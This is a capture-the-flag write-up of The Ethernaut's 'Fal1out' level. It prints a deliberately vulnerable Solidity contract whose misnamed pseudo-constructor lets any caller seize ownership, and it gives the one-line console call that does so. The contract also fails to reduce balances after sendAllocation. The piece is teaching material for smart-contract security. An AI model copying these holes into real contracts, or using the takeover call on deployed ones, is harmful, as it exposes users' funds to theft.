Fal1out - The Ethernaut - writeup
The goal of this challenge is to claim ownership of the contract. This is its code:
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
import "openzeppelin-contracts-06/math/SafeMath.sol";
// Fallout: records an ether "allocation" per address and lets the address stored
// in `owner` withdraw the whole contract balance.
// NOTE(review): no `constructor` is declared anywhere in this contract, so nothing
// in the visible code sets `owner` at deployment; it stays address(0) until
// Fal1out() is called.
contract Fallout {
using SafeMath for uint256;
// Amount of wei credited to each address by allocate() (or set by Fal1out()).
mapping(address => uint256) allocations;
// Address allowed through onlyOwner; written only inside Fal1out().
address payable public owner;
/* constructor */
// NOTE(review): despite the comment above, this is NOT a constructor. With
// `pragma solidity ^0.6.0` a constructor must be declared with the `constructor`
// keyword, and the name is "Fal1out" (digit 1), not the contract name "Fallout".
// It is therefore an ordinary public payable function: every call sets `owner`
// to the caller and overwrites allocations[owner] with msg.value.
function Fal1out() public payable {
owner = msg.sender;
allocations[owner] = msg.value;
}
// Reverts with "caller is not the owner" unless msg.sender equals `owner`.
// The check is only as strong as the code that assigns `owner` (see Fal1out()).
modifier onlyOwner() {
require(msg.sender == owner, "caller is not the owner");
_;
}
// Credits the ether sent with the call to the caller's allocation.
// Uses SafeMath.add, which reverts on uint256 overflow.
function allocate() public payable {
allocations[msg.sender] = allocations[msg.sender].add(msg.value);
}
// Sends `allocator` the amount recorded for it; reverts if that amount is zero.
// Callable by anyone, for any address.
// NOTE(review): allocations[allocator] is not reduced after the transfer, so the
// recorded amount no longer matches what the address is still owed.
function sendAllocation(address payable allocator) public {
require(allocations[allocator] > 0);
allocator.transfer(allocations[allocator]);
}
// Transfers the contract's entire ether balance to the caller; gated by onlyOwner.
function collectAllocations() public onlyOwner {
msg.sender.transfer(address(this).balance);
}
// Read-only accessor: returns the allocation recorded for `allocator`.
function allocatorBalance(address allocator) public view returns (uint256) {
return allocations[allocator];
}
}
Interacting with the contract is quite easy when solving The Ethernaut challenges:
-
After connecting our Metamask wallet, click on “Get New Instance”:

-
After approving the transaction, the contract address will be shown in the browser’s javascript console:

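This challenge is a piece of cake! Even though the Fal1out function has a comment saying it is a “constructor”, it is not. There is no constructor keyword (the only way to declare a constructor under pragma solidity ^0.6.0), and the function name is Fal1out, with the digit 1, not the contract name Fallout. Therefore it is a standard public function that anyone can call, and each call sets owner to the caller. The lesson for contract authors and auditors: initialise ownership inside constructor() and never rely on a comment or a function name to mark initialisation code.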
It is enough to execute this line in the javascript console:
await contract.Fal1out()
Now, click on “Submit Instance” to verify that the challenge was solved:
